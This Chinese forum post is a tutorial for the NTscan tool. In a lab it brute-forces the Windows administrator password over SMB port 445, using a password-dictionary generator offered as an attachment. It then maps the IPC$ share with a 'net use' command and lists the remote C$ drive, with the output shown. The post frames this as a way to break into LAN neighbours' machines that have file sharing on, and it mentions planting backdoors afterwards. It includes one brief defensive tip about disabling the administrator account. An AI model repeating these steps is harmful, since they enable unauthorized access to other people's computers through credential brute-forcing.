简述

NTscan提供主机扫描功能，可以直接在软件输入IP段范围搜索，设置开始地址，设置结束地址，点击开始按钮就可以对该IP段的主机查询，查询结果可以在软件界面显示，方便用户读取主机中的用户密码信息。最关键的是，可以进行445爆破，局域网的小伙伴一旦开启了文件共享，那就可以被NTscan结合字典进行爆破，从而可以直接入侵主机！

附件附赠一个社工密码生成器，可以根据关键信息生成密码字典。

功能

两种不同的扫描方式(SYN扫描和一般的connect扫描)
ntscan可以自定义扫描范围，输入所有服务器范围
同时对多个主机查询，找到您需要保护的账户和密码
将用户名字、密码、类型所对应的的IP地址显示在结果界面
支持线程设置，如果需要提高扫描速度就可以设置线程
支持扫描之前ping主机、扫描主机打开的端口
扫描速度可以在软件设置，软件右侧显示正在扫描的信息

使用实例

操作：

打开win2003、winXP，还原快照
配置网络在同一局域网，相互可以ping通
下面我们以winXP为主机，攻击win2003服务器
服务器部署
1. 在D盘新建一个目录share
2. 里面新建一个文件
3. 设置目录share共享，共享权限对everyone是完全开放
信息扫描
1. 打开winXP
2. 打开Scanport或者任何端口扫描的工具，扫描局域网的445端口，可以看到win2003的IP开放着445端口
漏洞利用之IPC$：
1. IPC$俗称“空链接”，是一种没有绝对路径的共享
  
  > IPC$(Internet Process Connection) 是共享 “ 命名管道 “ 的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问
2. 我们需要知道管理员的密码，即可建立空链接共享映射，就可以为所欲为了：
```
net use  \\192.168.22.128\ipc$ 密码 /user:用户
```
  对于用户，这里我们就定为administrator（常见管理员账号），密码我们通过暴力破解获取
  
  明白为什么win10默认禁用administrator账号了吧，他是人尽皆知的系统最高权限账号，建议你禁用administrator，或将其改名
暴力破解
1. 打开NTscan，设置IP和相关信息（设置开始地址、结束地址、扫描线程数等信息）
2. 用记事本打开NTscan程序自带的两个字典文件：
  - NT_user：爆破时用户名，写一个administrator
  - NT_pass：爆破时密码，可以自己慢慢添加，或者用密码生成工具生成密码
3. 打开NTscan，开始爆破
4. 爆破成功

建立空链接：

net use \\192.168.22.128\ipc$ 123456 /user:administrator

执行命令

查看C盘目录

C:\&gt;dir \\192.168.22.128\c$
 驱动器 \\192.168.22.128\c$ 中的卷没有标签。
 卷的序列号是 D4C5-DB9A

 \\192.168.22.128\c$ 的目录

2021-10-18  10:38                 0 AUTOEXEC.BAT
2021-10-18  10:38                 0 CONFIG.SYS
2021-10-18  10:44              Documents and
2021-10-18  10:56              Program Files
2021-10-18  10:37              Program Files
2021-10-18  14:53         toX
2021-10-18  14:52              WINDOWS
2021-10-18  10:38              wmpub
2021-11-04  17:44                26 新建 文本文档
               3 个文件             26 字节
               6 个目录  6,843,887,616 可用字节

入侵成功，后面就可以留后门等操作

好兄弟，有帮助记得点赞打赏，有来有往，回复可见附件